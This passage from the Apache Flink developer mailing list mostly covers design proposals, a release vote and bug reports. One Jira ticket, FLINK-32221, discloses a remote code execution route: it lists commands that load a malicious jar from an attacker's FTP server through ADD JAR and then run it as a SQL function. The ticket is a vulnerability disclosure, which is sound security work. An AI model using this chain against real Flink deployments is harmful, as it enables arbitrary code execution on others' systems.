I do see a benefit for Delta connector actually with this change and see
why this could be coupled with Catalog.

Delta Connector SQL support, also ships a Delta Catalog implementation for
Flink.
For Delta Catalog, table schema information is fetched from underlying
_delta_log and not stored in metastore. For time travel we actually had a
problem, that if we would like to timetravel back to some old version,
where schema was slightly different, then we would have a conflict since
Catalog would return current schema and not how it was for version X.

With your change, our Delta Catalog can actually fetch schema for version X
and send it to DeltaTableFactory. Currency, Catalog can fetch only current
version. What we would also need however is version (number/timestamp) for
this table passed to DynamicTableFactory so we could properly set Delta
standalone library.

Regards,
Krzysztof

śr., 31 maj 2023 o 10:37 Krzysztof Chmielewski <
krzysiek.chmielew...@gmail.com> napisał(a):

> Hi,
> happy to see such a feature.
> Small note from my end regarding Catalog changes.
>
> TL;DR
> I don't think it is necessary to delegate this feature to the catalog. I
> think that since "timetravel" is per job/query property, its should not be
> coupled with the Catalog or table definition. In my opinion this is
> something that DynamicTableFactory only has to know about. I would rather
> see this feature as it is - SQL syntax enhancement but delegate clearly to
> DynamicTableFactory.
>
> I've implemented timetravel feature for Delta Connector  [1]  using
> current Flink API.
> Docs are pending code review, but you can find them here [2] and examples
> are available here [3]
>
> The timetravel feature that I've implemented is based on Flink Query
> hints.
> "SELECT * FROM sourceTable /*+ OPTIONS('versionAsOf' = '1') */"
>
> The " versionAsOf" (we also have 'timestampAsOf') parameter is handled not
> by Catalog but by DyntamicTableFactory implementation for Delta connector.
> The value of this property is passed to Delta standalone lib API that
> returns table view for given version.
>
> I'm not sure how/if proposed change could benefit Delta connector
> implementation for this feature.
>
> Thanks,
> Krzysztof
>
> [1]
> https://github.com/delta-io/connectors/tree/flink_table_catalog_feature_branch/flink
> [2] https://github.com/kristoffSC/connectors/tree/FlinkSQL_PR_15-docs
> [3]
> https://github.com/delta-io/connectors/tree/flink_table_catalog_feature_branch/examples/flink-example/src/main/java/org/example/sql
>
> śr., 31 maj 2023 o 06:03 liu ron  napisał(a):
>
>> Hi, Feng
>>
>> Thanks for driving this FLIP, Time travel is very useful for Flink
>> integrate with data lake system. I have one question why the
>> implementation
>> of TimeTravel is delegated to Catalog? Assuming that we use Flink to query
>> Hudi table with the time travel syntax, but we don't use the HudiCatalog,
>> instead, we register the hudi table to InMemoryCatalog,  can we support
>> time travel for Hudi table in this case?
>> In contrast, I think time travel should bind to connector instead of
>> Catalog, so the rejected alternative should be considered.
>>
>> Best,
>> Ron
>>
>> yuxia  于2023年5月30日周二 09:40写道:
>>
>> > Hi, Feng.
>> > Notice this FLIP only support batch mode for time travel.  Would it also
>> > make sense to support stream mode to a read a snapshot of the table as a
>> > bounded stream?
>> >
>> > Best regards,
>> > Yuxia
>> >
>> > - 原始邮件 -
>> > 发件人: "Benchao Li" 
>> > 收件人: "dev" 
>> > 发送时间: 星期一, 2023年 5 月 29日 下午 6:04:53
>> > 主题: Re: [DISCUSS] FLIP-308: Support Time Travel In Batch Mode
>> >
>> > # Can Calcite support this syntax ` VERSION AS OF`  ?
>> >
>> > This also depends on whether this is defined in standard or any known
>> > databases that have implemented this. If not, it would be hard to push
>> it
>> > to Calcite.
>> >
>> > # getTable(ObjectPath object, long timestamp)
>> >
>> > Then we again come to the problem of "casting between timestamp and
>> > numeric", which has been disabled in FLINK-21978[1]. If you're gonna use
>> > this, then we need to clarify that problem first.
>> >
>> > [1] https://issues.apache.org/jira/browse/FLINK-21978
>> >
>> >
>> > Feng Jin  于2023年5月29日周一 15:57写道:
>> >
>> > > hi, thanks for your reply.
>> > >
>> > > @Benchao
>> > > > did you consider the pushdown abilities compatible
>> > >
>> > > In the current design, the implementation of TimeTravel is delegated
>> to
>> > > Catalog. We have added a function called getTable(ObjectPath
>> tablePath,
>> > > long timestamp) to obtain the corresponding CatalogBaseTable at a
>> > specific
>> > > time.  Therefore, I think it will not have any impact on the original
>> > > pushdown abilities.
>> > >
>> > >
>> > > >   I see there is a rejected  design for adding SupportsTimeTravel,
>> but
>> > I
>> > > didn't see the alternative in  the FLIP doc
>> > >
>> > > Sorry, 

Re: [DISCUSS] FLIP-316: Introduce SQL Driver

2023-05-31 Thread Paul Lam
Hi Shengkai,

Thanks a lot for your comments! Please see my comments inline.
 
> 1. The FLIP does not specify the kind of SQL that will be submitted with
> the application mode. I believe only a portion of the SQL will be delegated
> to the SqlRunner.

You’re right. For SQL Gateway, only DMLs need to be delegated to the SQL
Driver. I would think about the details and update the FLIP. Do you have some
ideas already?

> 2. Will the SQL Client/Gateway perform any validation before submitting the
> SQL to the SqlRunner? If the user's SQL is invalid, it could take a long

> time to fetch error messages before execution.

Yes, I think so. We could introduce a SQL Gateway option like 
`sql-gateway.application.validate-sql`, which determines if the Gateway
should do the SQL validation by compiling the plan.

> 3. ExecNodeGraph VS SQL File

ExecNodeGraph looks good to me. It’s not efficient to rebuild the 
same TableEnvironment from scratch with SQL files at JobManager.
ExecNodeGraph avoids that.

Then I think SQL Driver should accept SQL files and ExecNodeGraph,
while the former is for public usage and the latter is for internal usage.

> 4. SqlRunner VS ApplicationRunner


ApplicationRunner looks good for SQL Driver at first glance, but 
I’m afraid it has two limitations:

1) IIUC, ApplicationRunner should only be used in application mode, but
SQL Driver actually could be used in other deployment modes as well.
2) As FLIP-85 said, ApplicationRunner doesn’t work well with YARN.

What do you think?

> 5. K8S Application mode

WRT K8s application mode, I think it’s more of the users’ responsibility to
prepare the basic resources by customizing the image.

For non-SQL-gateway scenarios, the image should contain everything 
needed for the SQLs.

For SQL-gateway scenarios, that’s actually a missing part that we need to
discuss. The gateway-generated resources (e.g. ExecNodeGraph) can’t be
accessed at JobManager, unless:

1) use web submission to deploy and run jars
2) mount a distributed storage to both SQL gateway and all nodes that 
Flink runs on

I lean toward the web submission way but didn’t think through the details yet.

BTW, it seems that we don’t need `pipeline.jars` on K8s, we could put the 
jars into the classpath directly.

> 6. Could you add more details about your modification in the gateway side,
> including error handling, execution workflow, and the impact on job
> statements?

Sure. I’ll let you know when I finish the details.

Paul Lam

> 2023年5月31日 10:56,Shengkai Fang  写道:
> 
> Thanks for the proposal. The Application mode is very important to Flink
> SQL. But I have some questions about the FLIP:
> 
> 1. The FLIP does not specify the kind of SQL that will be submitted with
> the application mode. I believe only a portion of the SQL will be delegated
> to the SqlRunner.
> 2. Will the SQL Client/Gateway perform any validation before submitting the
> SQL to the SqlRunner? If the user's SQL is invalid, it could take a long
> time to fetch error messages before execution.
> 3. ExecNodeGraph VS SQL File
> 
> Initially, we planned to use ExecNodeGraph as the essential information to
> be submitted. By enabling 'table.plan.compile.catalog-objects' = 'all', the
> ExecNodeGraph provides necessary information about the session state.
> ExecNodeGraph contains the basic structure of tables and the class name of
> catalog functions used, which enables us to avoid serializing the catalog
> to the remote. Therefore, we prefer to use ExecGraph as the content
> submitted. Furthermore, our internal implementation can extend ExecGraph
> beyond state compatibility.
> 
> 4. SqlRunner VS ApplicationRunner
> 
> In the FLIP-85, it mentions to support Library mode. Compared to adding a
> new module, I think it's better to extend the origin design? WDYT?
> 
> ApplicationRunner.run((StreamExecutionEnvironment env) -> {
> 
>  … // a consumer of the env
> 
> })
> 
> 5. K8S Application mode
> 
> As far as I know, K8S doesn't support shipping multiple jars to the remote.
> It seems the current design also doesn't support K8S Application mode?
> 
> https://github.com/apache/flink/blob/master/flink-kubernetes/src/main/java/org/apache/flink/kubernetes/KubernetesClusterDescriptor.java#L217
> 
> 6. Could you add more details about your modification in the gateway side,
> including error handling, execution workflow, and the impact on job
> statements?
> 
> Best,
> Shengkai
> 
> Shammon FY  于2023年5月31日周三 10:40写道:
> 
>> Thanks Paul for driving this proposal.
>> 
>> I found the sql driver has no config related options. If I understand
>> correctly, the sql driver can be used to submit sql jobs in a 'job
>> submission service' such as sql-gateway. In general, in addition to the
>> default config for Flink cluster which includes k8s, ha and .etc, users may
>> also specify configurations for SQL jobs, including parallelism, number of
>> Task Managers, etc.
>> 
>> For example, in sql-gateway users can `set` dynamic parameters 

[jira] [Created] (FLINK-32224) Unable to connect multiple host using RabbitMQ Connector

2023-05-31 Thread someshwar (Jira)
someshwar created FLINK-32224:
-

 Summary: Unable to connect multiple host using RabbitMQ Connector
 Key: FLINK-32224
 URL: https://issues.apache.org/jira/browse/FLINK-32224
 Project: Flink
  Issue Type: Bug
  Components: Connectors/ RabbitMQ
Affects Versions: 1.14.2
Reporter: someshwar
 Fix For: 1.14.2


i have used same implement provided in below link
[https://nightlies.apache.org/flink/flink-docs-release-1.17/docs/connectors/datastream/rabbitmq/]

when i using with multiple host with comma separated get below issue 
 

at 
org.apache.flink.streaming.connectors.rabbitmq.RMQSource.open(RMQSource.java:267)
    at 
org.apache.flink.api.common.functions.util.FunctionUtils.openFunction(FunctionUtils.java:34)
    at 
org.apache.flink.streaming.api.operators.AbstractUdfStreamOperator.open(AbstractUdfStreamOperator.java:100)
    at 
org.apache.flink.streaming.runtime.tasks.RegularOperatorChain.initializeStateAndOpenOperators(RegularOperatorChain.java:110)
    at 
org.apache.flink.streaming.runtime.tasks.StreamTask.restoreGates(StreamTask.java:711)
    at 
org.apache.flink.streaming.runtime.tasks.StreamTaskActionExecutor$SynchronizedStreamTaskActionExecutor.call(StreamTaskActionExecutor.java:100)
    at 
org.apache.flink.streaming.runtime.tasks.StreamTask.restoreInternal(StreamTask.java:687)
    at 
org.apache.flink.streaming.runtime.tasks.StreamTask.restore(StreamTask.java:654)
    at 
org.apache.flink.runtime.taskmanager.Task.runWithSystemExitMonitoring(Task.java:958)
    at org.apache.flink.runtime.taskmanager.Task.restoreAndInvoke(Task.java:927)
    at org.apache.flink.runtime.taskmanager.Task.doRun(Task.java:766)
    at org.apache.flink.runtime.taskmanager.Task.run(Task.java:575)
    at java.base/java.lang.Thread.run(Thread.java:834)
Caused by: java.net.UnknownHostException: No such host is known 
(10.36.2.253,10.36.2.254,10.36.2.255)
    at java.base/java.net.Inet6AddressImpl.lookupAllHostAddr(Native Method)
    at 
java.base/java.net.InetAddress$PlatformNameService.lookupAllHostAddr(InetAddress.java:928)
    at 
java.base/java.net.InetAddress.getAddressesFromNameService(InetAddress.java:1514)
    at 
java.base/java.net.InetAddress$NameServiceAddresses.get(InetAddress.java:847)
    at java.base/java.net.InetAddress.getAllByName0(InetAddress.java:1504)
    at java.base/java.net.InetAddress.getAllByName(InetAddress.java:1363)
    at java.base/java.net.InetAddress.getAllByName(InetAddress.java:1297)
    at 
com.rabbitmq.client.DnsRecordIpAddressResolver.resolveIpAddresses(DnsRecordIpAddressResolver.java:83)
    at 
com.rabbitmq.client.DnsRecordIpAddressResolver.getAddresses(DnsRecordIpAddressResolver.java:73)
    at 
com.rabbitmq.client.impl.recovery.RecoveryAwareAMQConnectionFactory.newConnection(RecoveryAwareAMQConnectionFactory.java:58)
    at 
com.rabbitmq.client.impl.recovery.AutorecoveringConnection.init(AutorecoveringConnection.java:156)
    at 
com.rabbitmq.client.ConnectionFactory.newConnection(ConnectionFactory.java:1130)
    at 
com.rabbitmq.client.ConnectionFactory.newConnection(ConnectionFactory.java:1087)
    at 
com.rabbitmq.client.ConnectionFactory.newConnection(ConnectionFactory.java:1045)
    at 
com.rabbitmq.client.ConnectionFactory.newConnection(ConnectionFactory.java:1207)
    at 
org.apache.flink.streaming.connectors.rabbitmq.RMQSource.setupConnection(RMQSource.java:204)
    at 
org.apache.flink.streaming.connectors.rabbitmq.RMQSource.open(RMQSource.java:240)
    ... 12 more!MicrosoftTeams-image (59).png!



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Created] (FLINK-32223) Add Hive delegation token support

2023-05-31 Thread qingbo jiao (Jira)
qingbo jiao created FLINK-32223:
---

 Summary: Add Hive delegation token support 
 Key: FLINK-32223
 URL: https://issues.apache.org/jira/browse/FLINK-32223
 Project: Flink
  Issue Type: Improvement
Reporter: qingbo jiao






--
This message was sent by Atlassian Jira
(v8.20.10#820010)


Re: [DISCUSS] FLIP 295: Support persistence of Catalog configuration and asynchronous registration

2023-05-31 Thread Shammon FY
Hi feng,

Thanks for updating, I have some minor comments

1. The modification of `CatalogManager` should not be in `Public
Interfaces`, it is not a public interface.

2. `@PublicEvolving` should be added for `CatalogStore` and
`CatalogStoreFactory`

3. The code `Optional optionalDescriptor =
catalogStore.get(catalogName);` in the `CatalogManager` should be
`Optional optionalDescriptor =
catalogStore.get(catalogName);`

Best,
Shammon FY


On Wed, May 31, 2023 at 2:24 PM liu ron  wrote:

> Hi, Feng
>
> Thanks for driving this FLIP, this proposal is very useful for catalog
> management.
> I have some small questions:
>
> 1. Regarding the CatalogStoreFactory#createCatalogStore method, do we need
> to provide a default implementation?
> 2. If we get Catalog from CatalogStore, after initializing it, whether we
> put it to Map catalogs again?
> 3. Regarding the options `sql.catalog.store.type` and
> `sql.catalog.store.file.path`, how about renaming them to
> `catalog.store.type` and `catalog.store.path`?
>
> Best,
> Ron
>
> Feng Jin  于2023年5月29日周一 21:19写道:
>
> > Hi yuxia
> >
> >  > But from the code in Proposed Changes, once we register the Catalog,
> we
> > initialize it and open it. right?
> >
> > Yes, In order to avoid inconsistent semantics of the original CREATE
> > CATALOG DDL, Catalog will be directly initialized in registerCatalog so
> > that parameter validation can be performed.
> >
> > In the current design, lazy initialization is mainly reflected in
> > getCatalog. If CatalogStore has already saved some catalog
> configurations,
> > only initialization is required in getCatalog.
> >
> >
> > Best,
> > Feng
> >
> > On Mon, May 29, 2023 at 8:27 PM yuxia 
> wrote:
> >
> > > Hi, Feng.
> > > I'm trying to understanding the meaning of *lazy initialization*. If
> i'm
> > > wrong, please correct me.
> > >
> > > IIUC, lazy initialization means only you need to access the catalog,
> then
> > > you initialize it. But from the code in Proposed Changes, once we
> > register
> > > the Catalog,
> > > we initialize it and open it. right?
> > >
> > > Best regards,
> > > Yuxia
> > >
> > > - 原始邮件 -
> > > 发件人: "Jing Ge" 
> > > 收件人: "dev" 
> > > 发送时间: 星期一, 2023年 5 月 29日 下午 5:12:46
> > > 主题: Re: [DISCUSS] FLIP 295: Support persistence of Catalog
> configuration
> > > and asynchronous registration
> > >
> > > Hi Feng,
> > >
> > > Thanks for your effort! +1 for the proposal.
> > >
> > > One of the major changes is that current design will provide
> > > Map catalogs as a snapshot instead of a cache, which
> > means
> > > once it has been initialized, any changes done by other sessions will
> not
> > > affect it. Point 6 described follow-up options for further improvement.
> > >
> > > Best regards,
> > > Jing
> > >
> > > On Mon, May 29, 2023 at 5:31 AM Feng Jin 
> wrote:
> > >
> > > > Hi all, I would like to update you on the latest progress of the
> FLIP.
> > > >
> > > >
> > > > Last week, Leonard Xu, HangRuan, Jing Ge, Shammon FY, ShengKai Fang
> > and I
> > > > had an offline discussion regarding the overall solution for Flink
> > > > CatalogStore. We have reached a consensus and I have updated the
> final
> > > > solution in FLIP.
> > > >
> > > > Next, let me briefly describe the entire design:
> > > >
> > > >1.
> > > >
> > > >Introduce CatalogDescriptor to store catalog configuration similar
> > to
> > > >TableDescriptor.
> > > >2.
> > > >
> > > >The two key functions of CatalogStore - void storeCatalog(String
> > > >catalogName, CatalogDescriptor) and CatalogDescriptor
> > > getCatalog(String)
> > > >will both use CatalogDescriptor instead of Catalog instance. This
> > way,
> > > >CatalogStore will only be responsible for saving and retrieving
> > > catalog
> > > >configurations without having to initialize catalogs.
> > > >3.
> > > >
> > > >The default registerCatalog(String catalogName, Catalog catalog)
> > > >function in CatalogManager will be marked as deprecated.
> > > >4.
> > > >
> > > >A new function registerCatalog(String catalogName,
> CatalogDescriptor
> > > >catalog) will be added to serve as the default registration
> function
> > > for
> > > >catalogs in CatalogManager.
> > > >5.
> > > >
> > > >Map catalogs in CataloManager will remain
> unchanged
> > > and
> > > >save initialized catalogs.This means that deletion operations from
> > one
> > > >session won't synchronize with other sessions.
> > > >6.
> > > >
> > > >To support multi-session synchronization scenarios for deletions
> > later
> > > >on we should make Mapcatalogs configurable.There
> may
> > > be
> > > >three possible situations:
> > > >
> > > >a.Default caching of all initialized catalogs
> > > >
> > > >b.Introduction of LRU cache logic which can automatically clear
> > > >long-unused catalogs.
> > > >
> > > >c.No caching of any instances; each call to getCatalog creates a
> new
> > > >instance.
> > > >
> > > >
> > > > 

[jira] [Created] (FLINK-32222) Cassandra Source uses DataInputDeserializer and DataOutputSerializer non public apis

2023-05-31 Thread Etienne Chauchot (Jira)
Etienne Chauchot created FLINK-3:


 Summary: Cassandra Source uses DataInputDeserializer and 
DataOutputSerializer non public apis
 Key: FLINK-3
 URL: https://issues.apache.org/jira/browse/FLINK-3
 Project: Flink
  Issue Type: Technical Debt
Reporter: Etienne Chauchot
Assignee: Etienne Chauchot


in class _CassandraSplitSerializer,_ these non public APIs usage __ violate

_ConnectorRules#CONNECTOR_CLASSES_ONLY_DEPEND_ON_PUBLIC_API_



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


Re: [DISCUSS] FLIP-308: Support Time Travel In Batch Mode

2023-05-31 Thread Krzysztof Chmielewski
Hi,
happy to see such a feature.
Small note from my end regarding Catalog changes.

TL;DR
I don't think it is necessary to delegate this feature to the catalog. I
think that since "timetravel" is per job/query property, its should not be
coupled with the Catalog or table definition. In my opinion this is
something that DynamicTableFactory only has to know about. I would rather
see this feature as it is - SQL syntax enhancement but delegate clearly to
DynamicTableFactory.

I've implemented timetravel feature for Delta Connector  [1]  using current
Flink API.
Docs are pending code review, but you can find them here [2] and examples
are available here [3]

The timetravel feature that I've implemented is based on Flink Query hints.
"SELECT * FROM sourceTable /*+ OPTIONS('versionAsOf' = '1') */"

The " versionAsOf" (we also have 'timestampAsOf') parameter is handled not
by Catalog but by DyntamicTableFactory implementation for Delta connector.
The value of this property is passed to Delta standalone lib API that
returns table view for given version.

I'm not sure how/if proposed change could benefit Delta connector
implementation for this feature.

Thanks,
Krzysztof

[1]
https://github.com/delta-io/connectors/tree/flink_table_catalog_feature_branch/flink
[2] https://github.com/kristoffSC/connectors/tree/FlinkSQL_PR_15-docs
[3]
https://github.com/delta-io/connectors/tree/flink_table_catalog_feature_branch/examples/flink-example/src/main/java/org/example/sql

śr., 31 maj 2023 o 06:03 liu ron  napisał(a):

> Hi, Feng
>
> Thanks for driving this FLIP, Time travel is very useful for Flink
> integrate with data lake system. I have one question why the implementation
> of TimeTravel is delegated to Catalog? Assuming that we use Flink to query
> Hudi table with the time travel syntax, but we don't use the HudiCatalog,
> instead, we register the hudi table to InMemoryCatalog,  can we support
> time travel for Hudi table in this case?
> In contrast, I think time travel should bind to connector instead of
> Catalog, so the rejected alternative should be considered.
>
> Best,
> Ron
>
> yuxia  于2023年5月30日周二 09:40写道:
>
> > Hi, Feng.
> > Notice this FLIP only support batch mode for time travel.  Would it also
> > make sense to support stream mode to a read a snapshot of the table as a
> > bounded stream?
> >
> > Best regards,
> > Yuxia
> >
> > - 原始邮件 -
> > 发件人: "Benchao Li" 
> > 收件人: "dev" 
> > 发送时间: 星期一, 2023年 5 月 29日 下午 6:04:53
> > 主题: Re: [DISCUSS] FLIP-308: Support Time Travel In Batch Mode
> >
> > # Can Calcite support this syntax ` VERSION AS OF`  ?
> >
> > This also depends on whether this is defined in standard or any known
> > databases that have implemented this. If not, it would be hard to push it
> > to Calcite.
> >
> > # getTable(ObjectPath object, long timestamp)
> >
> > Then we again come to the problem of "casting between timestamp and
> > numeric", which has been disabled in FLINK-21978[1]. If you're gonna use
> > this, then we need to clarify that problem first.
> >
> > [1] https://issues.apache.org/jira/browse/FLINK-21978
> >
> >
> > Feng Jin  于2023年5月29日周一 15:57写道:
> >
> > > hi, thanks for your reply.
> > >
> > > @Benchao
> > > > did you consider the pushdown abilities compatible
> > >
> > > In the current design, the implementation of TimeTravel is delegated to
> > > Catalog. We have added a function called getTable(ObjectPath tablePath,
> > > long timestamp) to obtain the corresponding CatalogBaseTable at a
> > specific
> > > time.  Therefore, I think it will not have any impact on the original
> > > pushdown abilities.
> > >
> > >
> > > >   I see there is a rejected  design for adding SupportsTimeTravel,
> but
> > I
> > > didn't see the alternative in  the FLIP doc
> > >
> > > Sorry, the document description is not very clear.  Regarding whether
> to
> > > support SupportTimeTravel, I have discussed it with yuxia. Since we
> have
> > > already passed the corresponding time in getTable(ObjectPath, long
> > > timestamp) of Catalog, SupportTimeTravel may not be necessary.
> > >
> > > In getTable(ObjectPath object, long timestamp), we can obtain the
> schema
> > of
> > > the corresponding time point and put the SNAPSHOT that needs to be
> > consumed
> > > into options.
> > >
> > >
> > > @Shammon
> > > > Could we support this in Flink too?
> > >
> > > I personally think it's possible, but limited by Calcite's syntax
> > > restrictions. I believe we should first support this syntax in Calcite.
> > > Currently, I think it may not be easy  to support this syntax in
> Flink's
> > > parser. @Benchao, what do you think? Can Calcite support this syntax
> > > ` VERSION AS OF`  ?
> > >
> > >
> > > Best,
> > > Feng.
> > >
> > >
> > > On Fri, May 26, 2023 at 2:55 PM Shammon FY  wrote:
> > >
> > > > Thanks Feng, the feature of time travel sounds great!
> > > >
> > > > In addition to SYSTEM_TIME, lake houses such as paimon and iceberg
> > > support
> > > > snapshot or version. For example, users can query 

Re: [VOTE] Release flink-connector-jdbc v3.1.1, release candidate #1

2023-05-31 Thread Leonard Xu
+1 (binding)

- built from source code succeeded
- verified signatures
- verified hashsums 
- checked Github release tag, left one minor comment about the release commit
- checked release notes
- checked the contents contains jar and pom files in apache repo 
- reviewed the web PR 

Best,
Leonard


> On May 30, 2023, at 1:56 PM, Yuxin Tan  wrote:
> 
> +1 (non-binding)
> 
> - Checked sign
> - Checked the hash
> - Checked tag
> - Build from source
> 
> Best,
> Yuxin
> 
> 
> weijie guo  于2023年5月29日周一 14:14写道:
> 
>> +1 (non-binding)
>> 
>> - checked sign and checksum
>> - checked tag in github repository
>> - compiled from source
>> - checked the web PR
>> 
>> BTW, please remember to update docs/jdbc.yaml for the v3.1 branch after the
>> release is completed.
>> 
>> Best regards,
>> 
>> Weijie
>> 
>> 
>> Jing Ge  于2023年5月29日周一 04:26写道:
>> 
>>> +1 (non-binding)
>>> 
>>> - checked sign
>>> - checked hash
>>> - checked repos
>>> - checked tag
>>> - compiled from source
>>> - check the web PR
>>> 
>>> Best regards,
>>> Jing
>>> 
>>> 
>>> On Sun, May 28, 2023 at 4:00 PM Benchao Li  wrote:
>>> 
 Thanks Martijn,
 
 - checked signature/checksum [OK]
 - downloaded src, compiled from source [OK]
 - diffed src and tag, no binary files [OK]
 - gone through nexus staging area, looks good [OK]
 - run with flink 1.7.1 [OK]
 
 One thing I spotted is that the version in `docs/data/jdbc.yml` is
>> still
 3.1.0, I'm not sure whether this should be a blocker.
 
 
 Martijn Visser  于2023年5月25日周四 02:55写道:
 
> Hi everyone,
> Please review and vote on the release candidate #1 for the version
>>> 3.1.1,
> as follows:
> [ ] +1, Approve the release
> [ ] -1, Do not approve the release (please provide specific comments)
> 
> 
> The complete staging area is available for your review, which
>> includes:
> * JIRA release notes [1],
> * the official Apache source release to be deployed to
>> dist.apache.org
> [2],
> which are signed with the key with fingerprint
> A5F3BCE4CBE993573EC5966A65321B8382B219AF [3],
> * all artifacts to be deployed to the Maven Central Repository [4],
> * source code tag v3.1.1-rc1 [5],
> * website pull request listing the new release [6].
> 
> The vote will be open for at least 72 hours. It is adopted by
>> majority
> approval, with at least 3 PMC affirmative votes.
> 
> Thanks,
> Release Manager
> 
> [1]
> 
> 
 
>>> 
>> https://issues.apache.org/jira/secure/ReleaseNote.jspa?projectId=12315522=12353281
> [2]
> 
 
>>> 
>> https://dist.apache.org/repos/dist/dev/flink/flink-connector-jdbc-3.1.1-rc1
> [3] https://dist.apache.org/repos/dist/release/flink/KEYS
> [4]
> 
>>> https://repository.apache.org/content/repositories/orgapacheflink-1636/
> [5]
 https://github.com/apache/flink-connector-jdbc/releases/tag/v3.1.1-rc1
> [6] https://github.com/apache/flink-web/pull/654
> 
 
 
 --
 
 Best,
 Benchao Li
 
>>> 
>> 



Release 2.0 Status Updates - 05/31/2023

2023-05-31 Thread Xintong Song
Hi devs,

The release managers had some online discussions recently, and I'd like to
post the summary here for transparency.

We'd like to have 3 separate discussion tracks, so that each track can be
more focused.

   - Jark will help drive a discussion on the project's long-term roadmap.
   Concrete target of this discussion includes generating an updated version
   of the project roadmap[1], as well as a mechanism for regularly discussing
   and updating the roadmap.
   - Becket will help drive a discussion on the API compatibility,
   including the compatibility between 1.x and 2.0, as well as the general
   compatibility semantics. We are aware of the previous approved process
   (FLIP-197[2]). However, API compatibility across major releases and the
   process for deprecating / removing APIs seem not covered.
   - Martijn and Xintong will work on collecting work items for the 2.0
   release.
  - The items should be categorized into 2 kinds, must-have and
  nice-to-have.
  - We have created a wiki page[3] for collecting proposals, where we
  have already put some items based on previous discussions. *Please
  fill the chart with your proposals by June 15.*
  - After collecting the proposals, we'll organize further discussions
  to decide a minimum set of must-have items with the community.

Further plans such as how to manage the branches and whether to apply the
milestone release approach would depend on the outcome of the above
discussions.

Best,

Xintong (On behalf of the release management team)


[1] https://flink.apache.org/roadmap/

[2]
https://cwiki.apache.org/confluence/display/FLINK/FLIP-197%3A+API+stability+graduation+process

[3] https://cwiki.apache.org/confluence/display/FLINK/2.0+Release


Re: [DISCUSS] FLIP-287: Extend Sink#InitContext to expose ExecutionConfig and JobID

2023-05-31 Thread João Boto
If there is no more questions, I will start the voting thread tomorrow

On 2023/01/13 14:15:04 Joao Boto wrote:
> Hi flink devs,
> 
> I'd like to start a discussion thread for FLIP-287[1].
> This comes from an offline discussion with @Lijie Wang, from FLIP-239[2]
> specially for the sink[3].
> 
> Basically to expose the ExecutionConfig and JobId on SinkV2#InitContext.
> This  changes are necessary to correct migrate the current sinks to SinkV2
> like JdbcSink, KafkaTableSink and so on, that relies on RuntimeContext
> 
> Comments are welcome!
> Thanks,
> 
> [1]
> https://cwiki.apache.org/confluence/pages/viewpage.action?pageId=240880853
> [2]
> https://cwiki.apache.org/confluence/pages/viewpage.action?pageId=217386271
> [3] https://issues.apache.org/jira/browse/FLINK-25421
> 


[jira] [Created] (FLINK-32221) Attacker can achieve Remote Code Execution when they can control Flink SQL script content

2023-05-31 Thread gaoyu shi (Jira)
gaoyu shi created FLINK-32221:
-

 Summary: Attacker can achieve Remote Code Execution when they can 
control Flink SQL script content 
 Key: FLINK-32221
 URL: https://issues.apache.org/jira/browse/FLINK-32221
 Project: Flink
  Issue Type: Bug
 Environment: all version that support SQL Script.
Reporter: gaoyu shi
 Attachments: image-2023-05-31-14-58-21-800.png, 
image-2023-05-31-14-59-50-875.png

Flink SQL script has similiar syntax with tradition SQL, which means it also 
suffer SQL injection vulnerbility. 

Attacker can achieve Remote Code Execution when they can control part of whole 
of the Flink SQL script content by following steps.

1. attacker develop an evil custom Scalar Function class and package it into 
jar.

!image-2023-05-31-14-59-50-875.png|width=721,height=251!

2. run a ftp server on attacker host, and put the evil jar in it.

 
{code:java}
// install python-ftp-server tool
pip install python-ftp-server
// run ftp server
python3 -m python_ftp_server -d . --ip  -p password
// copy evil jar to current directory
cp  .{code}
3. Input the Flink SQL script to trigger code execution, which assumes that the 
attacker can control part or whole of the Flink SQL script through SQL 
injection or other method.

 

 
{code:java}
// transfer the evil jar from attacker host to victim
ADD JAR 'ftp://user:password@:6/evil.jar';
// register the evil function into the SQL context
CREATE FUNCTION EVIL AS 'org.example.Evil';
// run any bash command 
SELECT EVIL(''); {code}
 

 

In summary, this vulnerbility allows attacker get remote code execution through 
Flink SQL script. After looking at several websites that use flink, it is very 
common to concat user input into Flink SQL statements, or even directly allow 
users to enter arbitrary Flink SQL scripts to process data. 

I allow that it is not a vulnerability to execute malicious code through 
Flink's web interface to submit a malicious jar package, because developers 
will hide Flink's web interface by default, such as only listening to 
localhost. However, malicious code execution through Flink SQL scripts is 
completely different. Currently, there is no hardening method or default 
configuration that can prevent attackers from using Flink SQL to achieve 
arbitrary code execution.

Suggestion:

'ADD JAR' command should not be able to load remote jar, or it should be 
disable by default at least.



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


Re: [DISCUSS] FLIP-309: Enable operators to trigger checkpoints dynamically

2023-05-31 Thread Dong Lin
Hi Piotr,

Thanks for the reply. Please see my comments inline.

On Wed, May 31, 2023 at 12:58 AM Piotr Nowojski 
wrote:

> Hi Dong,
>
> First of all we don't need to send any extra signal from source (or non
> source) operators. All of the operators are already reporting backpressured
> metrics [1]
> and all of the metrics are already sent to JobManager. We would only need
>

Hmm... I am not sure metrics such as isBackPressured are already sent to
JM. According to the doc
,
this metric is only available on TaskManager. And I could't find the code
that sends these metrics to JM. Can you help provide link to the code and
doc that shows this metric is reported to JM.

Suppose this metric is indeed reported to JM, we also need to confirm that
the frequency meets our need. For example, typically metrics are updated on
the order of seconds. The default metric reporter interval (as specified in
MetricOptions) is 10 seconds, which is probably not sufficient for the
suggested approach to work reliably. This is because the longer the
interval, the more likely that the algorithm will not trigger checkpoint
using the short interval even if all subtasks are not-backpressured.

For example, let's say every source operator subtask reports this metric to
JM once every 10 seconds. There are 100 source subtasks. And each subtask
is backpressured roughly 10% of the total time due to traffic spikes (and
limited buffer). Then at any given time, there are 1 - 0.9^100 = 99.997%
chance that there is at least one subtask that is backpressured. Then we
have to wait for at least 10 seconds to check again. The expected
checkpointing interval can be very close to 30 minutes in the use-case
mentioned earlier.

to pass some accessor to the metrics to the `CheckpointTrigger`.


> > execution.checkpointing.interval.no-backpressure
>
> Maybe that's the way to go, but as I mentioned before, I could see this
> `CheckpointTrigger` to be a pluggable component, that could have been
> configured
> the same way as `MetricReporters` are right now [2]. We could just provide
> out of the box two plugins, one implementing current checkpoint triggering
> strategy,
> and the other using backpressure.
>

Yes, it is possible to add a CheckpointTrigger as a pluggable component. I
am open to this idea as long as it provides benefits over the job-level
config (e.g. covers more use-case, or simpler configuration for
common-case).

I think we can decide how to let user specify this interval after we are
able to address the other issues related to the feasibility and reliability
of the suggested approach.


